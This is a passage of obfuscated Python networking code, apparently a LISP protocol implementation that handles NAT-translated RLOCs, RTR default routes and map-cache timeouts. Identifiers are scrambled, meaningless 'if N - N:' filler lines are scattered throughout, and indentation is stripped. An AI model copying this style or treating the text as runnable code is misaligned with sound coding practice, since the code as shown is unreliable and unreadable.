if ( o0oO0O00 . translated_rloc . is_null ( ) ) : continue
return ( o0oO0O00 . translated_port )
if 41 - 41: OoOoOO00 . OOooOOo / OoOoOO00 % iIii1I11I1II1
if 47 - 47: ooOoO0o . i11iIiiIii / OoO0O00
return ( None )
if 48 - 48: O0
if 89 - 89: i11iIiiIii % OoO0O00 . OoOoOO00 + Oo0Ooo + OoOoOO00
if 53 - 53: Ii1I / OoOoOO00 % iII111i * OoooooooOO + Oo0Ooo
if 70 - 70: OoO0O00 % OoO0O00 * OoooooooOO
if 96 - 96: ooOoO0o * Ii1I + I11i + II111iiii * I1IiiI / iII111i
if 40 - 40: OoooooooOO - I11i % OOooOOo - I1IiiI . I1IiiI + Ii1I
if 97 - 97: OOooOOo . OoooooooOO . OOooOOo . i11iIiiIii
if 71 - 71: oO0o + I1ii11iIi11i * I1ii11iIi11i
if 79 - 79: oO0o
def lisp_get_any_translated_rloc ( ) :
for Oooo00oo in lisp_db_list :
for o0oO0O00 in Oooo00oo . rloc_set :
if ( o0oO0O00 . translated_rloc . is_null ( ) ) : continue
return ( o0oO0O00 . translated_rloc )
if 47 - 47: OoooooooOO - i1IIi * OOooOOo
if 11 - 11: I11i / OOooOOo . o0oOOo0O0Ooo - O0 * OoooooooOO % iII111i
return ( None )
if 7 - 7: OoOoOO00 . IiII + OoooooooOO - I1Ii111 / oO0o
if 32 - 32: iIii1I11I1II1 + I11i + OOooOOo - OoooooooOO + i11iIiiIii * o0oOOo0O0Ooo
if 8 - 8: iII111i
if 10 - 10: OoOoOO00 % I11i
if 49 - 49: oO0o % ooOoO0o + II111iiii
if 21 - 21: i1IIi + OoO0O00 . I1IiiI - Oo0Ooo
if 99 - 99: OoOoOO00
def lisp_get_all_translated_rlocs ( ) :
IIiiiI1IIi1iI1i = [ ]
for Oooo00oo in lisp_db_list :
for o0oO0O00 in Oooo00oo . rloc_set :
if ( o0oO0O00 . is_rloc_translated ( ) == False ) : continue
o0o00O0oOooO0 = o0oO0O00 . translated_rloc . print_address_no_iid ( )
IIiiiI1IIi1iI1i . append ( o0o00O0oOooO0 )
if 91 - 91: i11iIiiIii
if 62 - 62: I1IiiI % OoO0O00 * IiII
return ( IIiiiI1IIi1iI1i )
if 6 - 6: o0oOOo0O0Ooo + i11iIiiIii
if 97 - 97: o0oOOo0O0Ooo % OoOoOO00 * O0 / iIii1I11I1II1 * OoO0O00 / i11iIiiIii
if 1 - 1: OoooooooOO . Ii1I
if 68 - 68: Ii1I
if 98 - 98: iII111i
if 33 - 33: OoO0O00 - ooOoO0o % O0 % iIii1I11I1II1 * iII111i - iII111i
if 27 - 27: i11iIiiIii + I1ii11iIi11i + i1IIi
if 67 - 67: o0oOOo0O0Ooo
def lisp_update_default_routes ( map_resolver , iid , rtr_list ) :
OOOo0O00OO00O = ( os . getenv ( "LISP_RTR_BEHIND_NAT" ) != None )
if 58 - 58: IiII % o0oOOo0O0Ooo + i1IIi
iIi1I = { }
for I1II in rtr_list :
if ( I1II == None ) : continue
o0o00O0oOooO0 = rtr_list [ I1II ]
if ( OOOo0O00OO00O and o0o00O0oOooO0 . is_private_address ( ) ) : continue
iIi1I [ I1II ] = o0o00O0oOooO0
if 24 - 24: OoooooooOO - oO0o - Oo0Ooo - o0oOOo0O0Ooo
rtr_list = iIi1I
if 73 - 73: OoOoOO00 * OOooOOo / oO0o % Oo0Ooo
oo0OOOoO00OoO = [ ]
for IiiiII in [ LISP_AFI_IPV4 , LISP_AFI_IPV6 , LISP_AFI_MAC ] :
if ( IiiiII == LISP_AFI_MAC and lisp_l2_overlay == False ) : break
if 100 - 100: IiII / i11iIiiIii * O0
if 93 - 93: iII111i - I11i . I1IiiI + I11i
if 16 - 16: o0oOOo0O0Ooo . iII111i / OoOoOO00 / i11iIiiIii - o0oOOo0O0Ooo
if 35 - 35: ooOoO0o / I1Ii111 / I1Ii111
if 19 - 19: OoO0O00 % i11iIiiIii % iIii1I11I1II1
ii1111Ii = lisp_address ( IiiiII , "" , 0 , iid )
ii1111Ii . make_default_route ( ii1111Ii )
o0oO0o00 = lisp_map_cache . lookup_cache ( ii1111Ii , True )
if ( o0oO0o00 ) :
if ( o0oO0o00 . checkpoint_entry ) :
lprint ( "Updating checkpoint entry for {}" . format ( green ( o0oO0o00 . print_eid_tuple ( ) , False ) ) )
if 100 - 100: OOooOOo . oO0o % ooOoO0o * ooOoO0o . I1Ii111 - oO0o
elif ( o0oO0o00 . do_rloc_sets_match ( rtr_list . values ( ) ) ) :
continue
if 33 - 33: Oo0Ooo . i1IIi - OoooooooOO
o0oO0o00 . delete_cache ( )
if 14 - 14: I1Ii111 + Oo0Ooo
if 35 - 35: i11iIiiIii * Ii1I
oo0OOOoO00OoO . append ( [ ii1111Ii , "" ] )
if 100 - 100: O0 . iII111i / iIii1I11I1II1
if 47 - 47: ooOoO0o + OoOoOO00
if 67 - 67: IiII - I1ii11iIi11i * i1IIi - ooOoO0o
if 91 - 91: I11i
OOo0oOOO0 = lisp_address ( IiiiII , "" , 0 , iid )
OOo0oOOO0 . make_default_multicast_route ( OOo0oOOO0 )
oOoo0 = lisp_map_cache . lookup_cache ( OOo0oOOO0 , True )
if ( oOoo0 ) : oOoo0 = oOoo0 . source_cache . lookup_cache ( ii1111Ii , True )
if ( oOoo0 ) : oOoo0 . delete_cache ( )
if 88 - 88: OoooooooOO
oo0OOOoO00OoO . append ( [ ii1111Ii , OOo0oOOO0 ] )
if 73 - 73: ooOoO0o % iII111i * IiII - iIii1I11I1II1 + i1IIi + o0oOOo0O0Ooo
if ( len ( oo0OOOoO00OoO ) == 0 ) : return
if 63 - 63: iIii1I11I1II1
if 88 - 88: OoooooooOO
if 23 - 23: iII111i - IiII % i11iIiiIii
if 81 - 81: OoooooooOO % OoOoOO00 / IiII / OoooooooOO + i1IIi - O0
OoO0oOOooOO = [ ]
for iIi in rtr_list :
o000Oo00o = rtr_list [ iIi ]
o0oO0O00 = lisp_rloc ( )
o0oO0O00 . rloc . copy_address ( o000Oo00o )
o0oO0O00 . priority = 254
o0oO0O00 . mpriority = 255
o0oO0O00 . rloc_name = "RTR"
OoO0oOOooOO . append ( o0oO0O00 )
if 78 - 78: OoO0O00 - ooOoO0o + Oo0Ooo % i1IIi % iIii1I11I1II1
if 69 - 69: I11i % ooOoO0o
for ii1111Ii in oo0OOOoO00OoO :
o0oO0o00 = lisp_mapping ( ii1111Ii [ 0 ] , ii1111Ii [ 1 ] , OoO0oOOooOO )
o0oO0o00 . mapping_source = map_resolver
o0oO0o00 . map_cache_ttl = LISP_MR_TTL * 60
o0oO0o00 . add_cache ( )
lprint ( "Add {} to map-cache with RTR RLOC-set: {}" . format ( green ( o0oO0o00 . print_eid_tuple ( ) , False ) , rtr_list . keys ( ) ) )
if 58 - 58: I1IiiI . II111iiii + i11iIiiIii / OOooOOo . I1ii11iIi11i / I1IiiI
OoO0oOOooOO = copy . deepcopy ( OoO0oOOooOO )
if 23 - 23: iIii1I11I1II1 / Oo0Ooo - i11iIiiIii % o0oOOo0O0Ooo / OOooOOo - o0oOOo0O0Ooo
return
if 23 - 23: IiII + IiII . OOooOOo
if 77 - 77: I1Ii111 * O0 - IiII
if 21 - 21: Oo0Ooo % Oo0Ooo % Oo0Ooo
if 15 - 15: I1IiiI + OoO0O00 . I1IiiI / OoO0O00 . o0oOOo0O0Ooo
if 72 - 72: IiII + oO0o * o0oOOo0O0Ooo
if 39 - 39: O0 + iII111i + ooOoO0o / iIii1I11I1II1
if 91 - 91: Ii1I
if 62 - 62: I1Ii111 . iIii1I11I1II1 - Ii1I * I1ii11iIi11i % I11i % i1IIi
if 72 - 72: oO0o
if 3 - 3: ooOoO0o - Oo0Ooo / iII111i
def lisp_process_info_reply ( source , packet , store ) :
if 40 - 40: IiII + oO0o
if 95 - 95: I1Ii111 % OOooOOo + Ii1I * i11iIiiIii + i11iIiiIii
if 27 - 27: i11iIiiIii - iIii1I11I1II1 % I1Ii111
if 10 - 10: i11iIiiIii - Ii1I - OoooooooOO % II111iiii
I1iII = lisp_info ( )
packet = I1iII . decode ( packet )
if ( packet == None ) : return ( [ None , None , False ] )
if 42 - 42: OoOoOO00 + iII111i % Oo0Ooo
I1iII . print_info ( )
if 25 - 25: IiII % O0 * I11i * OoOoOO00 / OoooooooOO
if 80 - 80: I1IiiI . oO0o - I1IiiI - OoOoOO00 * ooOoO0o / O0
if 54 - 54: Oo0Ooo % iIii1I11I1II1 * Oo0Ooo
if 80 - 80: I1ii11iIi11i - I1ii11iIi11i
II1i11i1 = False
for iIi in I1iII . rtr_list :
oo0o00OO = iIi . print_address_no_iid ( )
if ( lisp_rtr_list . has_key ( oo0o00OO ) ) :
if ( lisp_register_all_rtrs == False ) : continue
if ( lisp_rtr_list [ oo0o00OO ] != None ) : continue
if 70 - 70: iIii1I11I1II1 - i11iIiiIii * OOooOOo
II1i11i1 = True
lisp_rtr_list [ oo0o00OO ] = iIi
if 17 - 17: ooOoO0o / IiII
if 4 - 4: i11iIiiIii + Ii1I - OOooOOo - i11iIiiIii - OoO0O00 . OOooOOo
if 5 - 5: I1IiiI / OoOoOO00 / i11iIiiIii
if 59 - 59: I11i - Ii1I - O0
if 7 - 7: OoooooooOO
if ( lisp_i_am_itr and II1i11i1 ) :
if ( lisp_iid_to_interface == { } ) :
lisp_update_default_routes ( source , lisp_default_iid , lisp_rtr_list )
else :
for IiIIi11i111 in lisp_iid_to_interface . keys ( ) :
lisp_update_default_routes ( source , int ( IiIIi11i111 ) , lisp_rtr_list )
if 13 - 13: I11i - o0oOOo0O0Ooo - O0 % Oo0Ooo - oO0o * OoOoOO00
if 76 - 76: IiII
if 88 - 88: o0oOOo0O0Ooo * II111iiii % Oo0Ooo * I1ii11iIi11i . I1IiiI % I1ii11iIi11i
if 37 - 37: OOooOOo % OoO0O00 % oO0o . I11i / OOooOOo
if 8 - 8: iIii1I11I1II1 + O0 + IiII - IiII * I1Ii111 / i1IIi
if 10 - 10: Oo0Ooo . i11iIiiIii + iIii1I11I1II1 % iII111i + i11iIiiIii
if 6 - 6: OoOoOO00 + OOooOOo + Oo0Ooo
if ( store == False ) :
return ( [ I1iII . global_etr_rloc , I1iII . etr_port , II1i11i1 ] )
if 43 - 43: IiII * iII111i . ooOoO0o / I1ii11iIi11i . ooOoO0o * II111iiii
if 30 - 30: iII111i
if 51 - 51: ooOoO0o + oO0o
if 80 - 80: O0 - I1Ii111 * Ii1I + I1ii11iIi11i % II111iiii . I11i
if 80 - 80: OoOoOO00 - OOooOOo
if 37 - 37: ooOoO0o
for Oooo00oo in lisp_db_list :
for o0oO0O00 in Oooo00oo . rloc_set :
I1II = o0oO0O00 . rloc
II1i = o0oO0O00 . interface
if ( II1i == None ) :
if ( I1II . is_null ( ) ) : continue
if ( I1II . is_local ( ) == False ) : continue
if ( I1iII . private_etr_rloc . is_null ( ) == False and
I1II . is_exact_match ( I1iII . private_etr_rloc ) == False ) :
continue
if 22 - 22: I1ii11iIi11i + II111iiii / OoooooooOO % o0oOOo0O0Ooo * OoOoOO00 . Oo0Ooo
elif ( I1iII . private_etr_rloc . is_dist_name ( ) ) :
IIiiI11iI = I1iII . private_etr_rloc . address
if ( IIiiI11iI != o0oO0O00 . rloc_name ) : continue
if 26 - 26: OoO0O00 % oO0o * Ii1I % OoooooooOO - oO0o
if 46 - 46: I1IiiI + OoO0O00 - O0 * O0
Ii1i1 = green ( Oooo00oo . eid . print_prefix ( ) , False )
O0ooo0Ooo = red ( I1II . print_address_no_iid ( ) , False )
if 75 - 75: OOooOOo + iIii1I11I1II1 * OOooOOo
o0O0O00oO = I1iII . global_etr_rloc . is_exact_match ( I1II )
if ( o0oO0O00 . translated_port == 0 and o0O0O00oO ) :
lprint ( "No NAT for {} ({}), EID-prefix {}" . format ( O0ooo0Ooo ,
II1i , Ii1i1 ) )
continue
if 67 - 67: o0oOOo0O0Ooo - I1IiiI * iIii1I11I1II1
if 29 - 29: i1IIi / Ii1I / oO0o * iII111i
if 44 - 44: O0
if 95 - 95: OOooOOo + OOooOOo - OoOoOO00
if 83 - 83: II111iiii * ooOoO0o - O0 - i11iIiiIii
Oo0o0oO = I1iII . global_etr_rloc
o0oO0oOOO0o0 = o0oO0O00 . translated_rloc
if ( o0oO0oOOO0o0 . is_exact_match ( Oo0o0oO ) and
I1iII . etr_port == o0oO0O00 . translated_port ) : continue
if 19 - 19: iII111i / i1IIi * O0 - OoO0O00
lprint ( "Store translation {}:{} for {} ({}), EID-prefix {}" . format ( red ( I1iII . global_etr_rloc . print_address_no_iid ( ) , False ) ,
# ooOoO0o
I1iII . etr_port , O0ooo0Ooo , II1i , Ii1i1 ) )
if 26 - 26: oO0o - OoooooooOO + ooOoO0o + Ii1I
o0oO0O00 . store_translated_rloc ( I1iII . global_etr_rloc ,
I1iII . etr_port )
if 52 - 52: I1IiiI
if 27 - 27: IiII . iII111i * I1ii11iIi11i
return ( [ I1iII . global_etr_rloc , I1iII . etr_port , II1i11i1 ] )
if 49 - 49: oO0o % iII111i
if 42 - 42: iII111i
if 74 - 74: Oo0Ooo / Ii1I / iIii1I11I1II1 + o0oOOo0O0Ooo
if 17 - 17: OOooOOo
if 75 - 75: Ii1I / i1IIi % I1ii11iIi11i . Ii1I
if 46 - 46: II111iiii * OoO0O00
if 77 - 77: ooOoO0o * I11i
if 85 - 85: OoO0O00 * I1Ii111 - OoooooooOO / iIii1I11I1II1 - i1IIi + Ii1I
def lisp_test_mr ( lisp_sockets , port ) :
return
lprint ( "Test Map-Resolvers" )
if 76 - 76: iII111i * OoooooooOO
iiI1I1IIi = lisp_address ( LISP_AFI_IPV4 , "" , 0 , 0 )
IiI1IiIIi = lisp_address ( LISP_AFI_IPV6 , "" , 0 , 0 )
if 3 - 3: I11i % iII111i - I1Ii111
if 64 - 64: II111iiii + i11iIiiIii
if 62 - 62: I1ii11iIi11i - I1IiiI * i11iIiiIii % oO0o
if 63 - 63: II111iiii - Oo0Ooo
iiI1I1IIi . store_address ( "10.0.0.1" )
lisp_send_map_request ( lisp_sockets , port , None , iiI1I1IIi , None )
iiI1I1IIi . store_address ( "192.168.0.1" )
lisp_send_map_request ( lisp_sockets , port , None , iiI1I1IIi , None )
if 55 - 55: iIii1I11I1II1 / O0 * O0 * i11iIiiIii * OoooooooOO
if 94 - 94: II111iiii . II111iiii / OoOoOO00 % oO0o * i1IIi % Oo0Ooo
if 78 - 78: IiII - I1IiiI
if 59 - 59: oO0o + i1IIi - IiII % OOooOOo % iIii1I11I1II1
IiI1IiIIi . store_address ( "0100::1" )
lisp_send_map_request ( lisp_sockets , port , None , IiI1IiIIi , None )
IiI1IiIIi . store_address ( "8000::1" )
lisp_send_map_request ( lisp_sockets , port , None , IiI1IiIIi , None )
if 71 - 71: OoO0O00
if 72 - 72: II111iiii + o0oOOo0O0Ooo / i1IIi * Oo0Ooo / i1IIi
if 52 - 52: I1Ii111 % OoO0O00 . I1Ii111 * I1ii11iIi11i * OoOoOO00 + i1IIi
if 54 - 54: Ii1I / I1IiiI
IiiIOo0o00 = threading . Timer ( LISP_TEST_MR_INTERVAL , lisp_test_mr ,
[ lisp_sockets , port ] )
IiiIOo0o00 . start ( )
return
if 38 - 38: II111iiii
if 59 - 59: OoooooooOO . ooOoO0o / OOooOOo - OOooOOo / iIii1I11I1II1 / oO0o
if 58 - 58: iIii1I11I1II1 - OoO0O00
if 74 - 74: o0oOOo0O0Ooo . OOooOOo
if 96 - 96: OoooooooOO
if 19 - 19: Ii1I / OoooooooOO
if 67 - 67: I1ii11iIi11i - OoooooooOO + OoooooooOO * o0oOOo0O0Ooo * iII111i
if 30 - 30: I1ii11iIi11i % Ii1I
if 2 - 2: I1IiiI . IiII . iIii1I11I1II1 - OOooOOo
if 56 - 56: OoooooooOO + I1IiiI / I11i % i11iIiiIii / o0oOOo0O0Ooo / Ii1I
if 27 - 27: oO0o
if 98 - 98: OoOoOO00 . oO0o + I1ii11iIi11i
if 14 - 14: OoooooooOO
def lisp_update_local_rloc ( rloc ) :
if ( rloc . interface == None ) : return
if 73 - 73: OoOoOO00 % o0oOOo0O0Ooo
o0o00O0oOooO0 = lisp_get_interface_address ( rloc . interface )
if ( o0o00O0oOooO0 == None ) : return
if 28 - 28: OoO0O00
iIOOOO0oO0o0 = rloc . rloc . print_address_no_iid ( )
Ooo00O0ooOo = o0o00O0oOooO0 . print_address_no_iid ( )
if 88 - 88: I1ii11iIi11i + OoooooooOO % I1ii11iIi11i
if ( iIOOOO0oO0o0 == Ooo00O0ooOo ) : return
if 3 - 3: I1Ii111 . O0 * OOooOOo * I11i + Ii1I * I1IiiI
lprint ( "Local interface address changed on {} from {} to {}" . format ( rloc . interface , iIOOOO0oO0o0 , Ooo00O0ooOo ) )
if 18 - 18: iIii1I11I1II1 % ooOoO0o . o0oOOo0O0Ooo * iII111i % iII111i
if 64 - 64: I1Ii111 . I11i
rloc . rloc . copy_address ( o0o00O0oOooO0 )
lisp_myrlocs [ 0 ] = o0o00O0oOooO0
return
if 32 - 32: I1ii11iIi11i + IiII % OoOoOO00 . O0
if 70 - 70: IiII + iII111i . i11iIiiIii + OoO0O00
if 45 - 45: o0oOOo0O0Ooo - ooOoO0o
if 2 - 2: OOooOOo + iII111i * ooOoO0o + II111iiii
if 88 - 88: ooOoO0o * OoO0O00 * I1ii11iIi11i - I1IiiI * IiII * I11i
if 37 - 37: iIii1I11I1II1
if 50 - 50: o0oOOo0O0Ooo - OOooOOo * IiII % Oo0Ooo
if 81 - 81: OoooooooOO - OoOoOO00 % I1ii11iIi11i % I1ii11iIi11i + OoOoOO00
def lisp_update_encap_port ( mc ) :
for I1II in mc . rloc_set :
IIIii = lisp_get_nat_info ( I1II . rloc , I1II . rloc_name )
if ( IIIii == None ) : continue
if ( I1II . translated_port == IIIii . port ) : continue
if 49 - 49: Ii1I + iIii1I11I1II1 . O0 * OOooOOo * OoooooooOO - OOooOOo
lprint ( ( "Encap-port changed from {} to {} for RLOC {}, " + "EID-prefix {}" ) . format ( I1II . translated_port , IIIii . port ,
# Ii1I * iIii1I11I1II1
red ( I1II . rloc . print_address_no_iid ( ) , False ) ,
green ( mc . print_eid_tuple ( ) , False ) ) )
if 3 - 3: OoO0O00 / i11iIiiIii % O0 * OoOoOO00 % I11i
I1II . store_translated_rloc ( I1II . rloc , IIIii . port )
if 5 - 5: i1IIi + OoO0O00 % O0 + OoO0O00
return
if 21 - 21: ooOoO0o * oO0o / OoooooooOO % ooOoO0o / O0
if 24 - 24: OoO0O00 - i11iIiiIii / i11iIiiIii * I1Ii111
if 20 - 20: IiII % iIii1I11I1II1 . iII111i + iIii1I11I1II1 + O0
if 96 - 96: I1ii11iIi11i - IiII % OoooooooOO . iII111i
if 30 - 30: Oo0Ooo . OoooooooOO / Oo0Ooo / oO0o
if 44 - 44: I1ii11iIi11i % o0oOOo0O0Ooo / iIii1I11I1II1 - o0oOOo0O0Ooo / I11i * I1Ii111
if 49 - 49: iII111i / iII111i - OoOoOO00
if 89 - 89: ooOoO0o
if 16 - 16: oO0o + oO0o + i1IIi + iIii1I11I1II1
if 93 - 93: I1IiiI - i11iIiiIii * I1Ii111 - O0 + iII111i
if 11 - 11: iII111i
if 100 - 100: OoooooooOO / ooOoO0o . OoO0O00
def lisp_timeout_map_cache_entry ( mc , delete_list ) :
if ( mc . map_cache_ttl == None ) :
lisp_update_encap_port ( mc )
return ( [ True , delete_list ] )
if 89 - 89: I11i % II111iiii
if 35 - 35: oO0o
ooO0 = lisp_get_timestamp ( )
if 65 - 65: II111iiii
if 87 - 87: oO0o / OoO0O00 - oO0o
if 69 - 69: i11iIiiIii
if 29 - 29: IiII . ooOoO0o / iII111i - OOooOOo / OOooOOo % Oo0Ooo
if 42 - 42: OoO0O00 . I1Ii111 . I1IiiI + Oo0Ooo * O0
if 35 - 35: Oo0Ooo / iII111i - O0 - OOooOOo * Oo0Ooo . i11iIiiIii
if ( mc . last_refresh_time + mc . map_cache_ttl > ooO0 ) :
if ( mc . action == LISP_NO_ACTION ) : lisp_update_encap_port ( mc )
return ( [ True , delete_list ] )
if 43 - 43: OoOoOO00 % oO0o % OoO0O00 / Ii1I . I11i
if 86 - 86: I1Ii111 * i1IIi + IiII - OoOoOO00
if 14 - 14: I1ii11iIi11i / i11iIiiIii * I11i % o0oOOo0O0Ooo + IiII / I1ii11iIi11i
if 82 - 82: OOooOOo . oO0o
if 12 - 12: i11iIiiIii + II111iiii
if ( lisp_nat_traversal and mc . eid . address == 0 and mc . eid . mask_len == 0 ) :
return ( [ True , delete_list ] )
if 49 - 49: OoooooooOO
if 48 - 48: i1IIi . IiII - O0 + OoooooooOO
if 6 - 6: I1Ii111 * OOooOOo + o0oOOo0O0Ooo . I1ii11iIi11i * I1Ii111
if 6 - 6: oO0o / II111iiii
if 23 - 23: IiII - OoooooooOO / oO0o
Ooo0o0oo0 = lisp_print_elapsed ( mc . last_refresh_time )
iIIiIIiII111 = mc . print_eid_tuple ( )
lprint ( "Map-cache entry for EID-prefix {} has {}, had uptime of {}" . format ( green ( iIIiIIiII111 , False ) , bold ( "timed out" , False ) , Ooo0o0oo0 ) )
if 69 - 69: O0 - OoooooooOO
if 31 - 31: o0oOOo0O0Ooo . i1IIi - i1IIi % i1IIi - iIii1I11I1II1
if 50 - 50: IiII - OOooOOo % OoOoOO00
if 66 - 66: IiII * i11iIiiIii
if 64 - 64: i11iIiiIii . I1Ii111 % i11iIiiIii % I11i
delete_list . append ( mc )
return ( [ True , delete_list ] )
if 56 - 56: o0oOOo0O0Ooo + ooOoO0o + OoooooooOO
if 64 - 64: OOooOOo / OoOoOO00
if 30 - 30: OOooOOo % I1Ii111 - i11iIiiIii
if 20 - 20: i1IIi * I11i / OoO0O00 / i1IIi / I1Ii111 * O0
if 95 - 95: Ii1I + Ii1I % IiII - IiII / OOooOOo
if 46 - 46: IiII + iII111i + II111iiii . iII111i - i11iIiiIii % OoO0O00
if 24 - 24: oO0o + IiII . o0oOOo0O0Ooo . OoooooooOO . i11iIiiIii / I1ii11iIi11i
if 49 - 49: IiII
def lisp_timeout_map_cache_walk ( mc , parms ) :
OoiIIi11 = parms [ 0 ]
iI11 = parms [ 1 ]
if 58 - 58: OoO0O00 + I1ii11iIi11i * oO0o * I11i / oO0o
if 68 - 68: iII111i . IiII . OoooooooOO . I1ii11iIi11i
if 79 - 79: OoooooooOO / i1IIi
if 30 - 30: Ii1I . IiII
if ( mc . group . is_null ( ) ) :
OO0OO0oO0o000 , OoiIIi11 = lisp_timeout_map_cache_entry ( mc , OoiIIi11 )
if ( OoiIIi11 == [ ] or mc != OoiIIi11 [ - 1 ] ) :
iI11 = lisp_write_checkpoint_entry ( iI11 , mc )
if 24 - 24: O0
return ( [ OO0OO0oO0o000 , parms ] )
if 6 - 6: I1IiiI . i11iIiiIii . OoooooooOO . I1IiiI . o0oOOo0O0Ooo
if 65 - 65: i11iIiiIii
if ( mc . source_cache == None ) : return ( [ True , parms ] )
if 46 - 46: i11iIiiIii
if 70 - 70: i1IIi + o0oOOo0O0Ooo
if 44 - 44: iII111i . II111iiii % o0oOOo0O0Ooo
if 29 - 29: i11iIiiIii * i1IIi
if 36 - 36: OoO0O00 * I11i . ooOoO0o
parms = mc . source_cache . walk_cache ( lisp_timeout_map_cache_entry , parms )
return ( [ True , parms ] )
if 50 - 50: oO0o * OoOoOO00 / OoO0O00 / ooOoO0o + II111iiii
if 55 - 55: II111iiii - IiII
if 24 - 24: oO0o % Ii1I / i1IIi
if 84 - 84: i1IIi
if 53 - 53: OoooooooOO - i1IIi - Ii1I
if 73 - 73: I1ii11iIi11i - Ii1I * o0oOOo0O0Ooo
if 29 - 29: o0oOOo0O0Ooo % IiII % OOooOOo + OoooooooOO - o0oOOo0O0Ooo
def lisp_timeout_map_cache ( lisp_map_cache ) :
I1I1i = [ [ ] , [ ] ]
I1I1i = lisp_map_cache . walk_cache ( lisp_timeout_map_cache_walk , I1I1i )
if 34 - 34: Ii1I
if 5 - 5: II111iiii . I1ii11iIi11i
if 85 - 85: I1Ii111 . IiII + II111iiii
if 92 - 92: iII111i / o0oOOo0O0Ooo * oO0o . I11i % o0oOOo0O0Ooo
if 87 - 87: Ii1I / Oo0Ooo % iIii1I11I1II1 / iII111i
OoiIIi11 = I1I1i [ 0 ]
for o0oO0o00 in OoiIIi11 : o0oO0o00 . delete_cache ( )
if 42 - 42: OoO0O00 . I1IiiI . OOooOOo + ooOoO0o
if 87 - 87: OOooOOo
if 44 - 44: Oo0Ooo + iIii1I11I1II1
if 67 - 67: iII111i . OOooOOo / ooOoO0o * iIii1I11I1II1
iI11 = I1I1i [ 1 ]
lisp_checkpoint ( iI11 )
return
if 29 - 29: I1Ii111 / OoOoOO00 % I1ii11iIi11i * IiII / II111iiii
if 10 - 10: O0 / I11i
if 29 - 29: i11iIiiIii % I11i
if 49 - 49: I11i
if 69 - 69: o0oOOo0O0Ooo . O0 * I11i
if 92 - 92: OoO0O00 . O0 / Ii1I % Oo0Ooo . Ii1I
if 40 - 40: o0oOOo0O0Ooo - Ii1I . iII111i - O0
if 53 - 53: Oo0Ooo - I1IiiI * O0 . II111iiii
if 72 - 72: ooOoO0o - Ii1I . Ii1I . I11i / OoooooooOO + Ii1I
if 32 - 32: O0
if 42 - 42: i1IIi * I1ii11iIi11i * OoOoOO00
if 43 - 43: I1ii11iIi11i % I1ii11iIi11i % i1IIi
if 56 - 56: I1IiiI - OoO0O00 - iII111i . o0oOOo0O0Ooo . I1Ii111
if 70 - 70: iIii1I11I1II1 - I11i
if 2 - 2: oO0o / II111iiii * OoO0O00
if 71 - 71: i1IIi + I11i * OoO0O00 . OOooOOo + oO0o
def lisp_store_nat_info ( hostname , rloc , port ) :
oo0o00OO = rloc . print_address_no_iid ( )
ii1Ii1i1ii = "{} NAT state for {}, RLOC {}, port {}" . format ( "{}" ,
blue ( hostname , False ) , red ( oo0o00OO , False ) , port )
if 100 - 100: oO0o / iII111i / i1IIi . II111iiii % I11i - I11i
I1iiI = lisp_nat_info ( oo0o00OO , hostname , port )
if 15 - 15: Ii1I / OOooOOo % i1IIi . I1Ii111 / O0 + I1Ii111
if ( lisp_nat_state_info . has_key ( hostname ) == False ) :
lisp_nat_state_info [ hostname ] = [ I1iiI ]
lprint ( ii1Ii1i1ii . format ( "Store initial" ) )
return ( True )
if 39 - 39: I1ii11iIi11i * I1IiiI * II111iiii . Oo0Ooo % I1IiiI
if 100 - 100: iIii1I11I1II1 - OoooooooOO * OoooooooOO - iII111i / ooOoO0o
if 98 - 98: OoO0O00 + oO0o - II111iiii
if 84 - 84: Oo0Ooo . OoOoOO00 - iII111i
if 5 - 5: OoooooooOO . O0 / OOooOOo + I11i - Ii1I
if 77 - 77: iIii1I11I1II1 * Oo0Ooo . IiII / oO0o + O0
IIIii = lisp_nat_state_info [ hostname ] [ 0 ]
if ( IIIii . address == oo0o00OO and IIIii . port == port ) :
IIIii . uptime = lisp_get_timestamp ( )
lprint ( ii1Ii1i1ii . format ( "Refresh existing" ) )
return ( False )
if 76 - 76: iII111i + o0oOOo0O0Ooo - OoooooooOO * oO0o % OoooooooOO - O0
if 18 - 18: Ii1I
if 82 - 82: OoOoOO00 + OoO0O00 - IiII / ooOoO0o
if 70 - 70: OoO0O00
if 43 - 43: ooOoO0o + OOooOOo + II111iiii - I1IiiI
if 58 - 58: I11i
if 94 - 94: Oo0Ooo
I11II1I1I = None
for IIIii in lisp_nat_state_info [ hostname ] :
if ( IIIii . address == oo0o00OO and IIIii . port == port ) :
I11II1I1I = IIIii
break
if 8 - 8: i1IIi % i1IIi % OoooooooOO % i1IIi . iIii1I11I1II1
if 70 - 70: O0 + II111iiii % IiII / I1Ii111 - IiII
if 58 - 58: II111iiii * oO0o - i1IIi . I11i
if ( I11II1I1I == None ) :
lprint ( ii1Ii1i1ii . format ( "Store new" ) )
else :
lisp_nat_state_info [ hostname ] . remove ( I11II1I1I )
lprint ( ii1Ii1i1ii . format ( "Use previous" ) )
if 23 - 23: OoO0O00 - I1IiiI * i11iIiiIii
if 62 - 62: OoO0O00 . i11iIiiIii / i1IIi
II1i1I1 = lisp_nat_state_info [ hostname ]
lisp_nat_state_info [ hostname ] = [ I1iiI ] + II1i1I1
return ( True )
if 40 - 40: II111iiii
if 56 - 56: II111iiii * iII111i
if 51 - 51: I1IiiI . ooOoO0o / Ii1I / I1Ii111
if 84 - 84: I11i - Ii1I
if 36 - 36: i1IIi
if 21 - 21: iII111i . OoOoOO00 % o0oOOo0O0Ooo - i11iIiiIii
if 86 - 86: I1Ii111 % i11iIiiIii
if 22 - 22: I1Ii111
def lisp_get_nat_info ( rloc , hostname ) :
if ( lisp_nat_state_info . has_key ( hostname ) == False ) : return ( None )
if 64 - 64: OoOoOO00 + II111iiii + o0oOOo0O0Ooo % iIii1I11I1II1 - OOooOOo
oo0o00OO = rloc . print_address_no_iid ( )
for IIIii in lisp_nat_state_info [ hostname ] :
if ( IIIii . address == oo0o00OO ) : return ( IIIii )
if 60 - 60: ooOoO0o % iIii1I11I1II1 / iIii1I11I1II1
return ( None )
if 61 - 61: oO0o
if 12 - 12: iIii1I11I1II1 - I1ii11iIi11i % I1ii11iIi11i * I1Ii111
if 98 - 98: oO0o / iII111i - Oo0Ooo / I1Ii111 * oO0o - OoO0O00
if 12 - 12: IiII . OoooooooOO - iIii1I11I1II1 % iII111i
if 56 - 56: Oo0Ooo / I1IiiI + iIii1I11I1II1 + I1IiiI % iIii1I11I1II1
if 64 - 64: O0
if 55 - 55: OoO0O00 * oO0o . Ii1I + OoOoOO00 % I11i + IiII
if 55 - 55: OoooooooOO + oO0o . o0oOOo0O0Ooo % iIii1I11I1II1 - I1Ii111
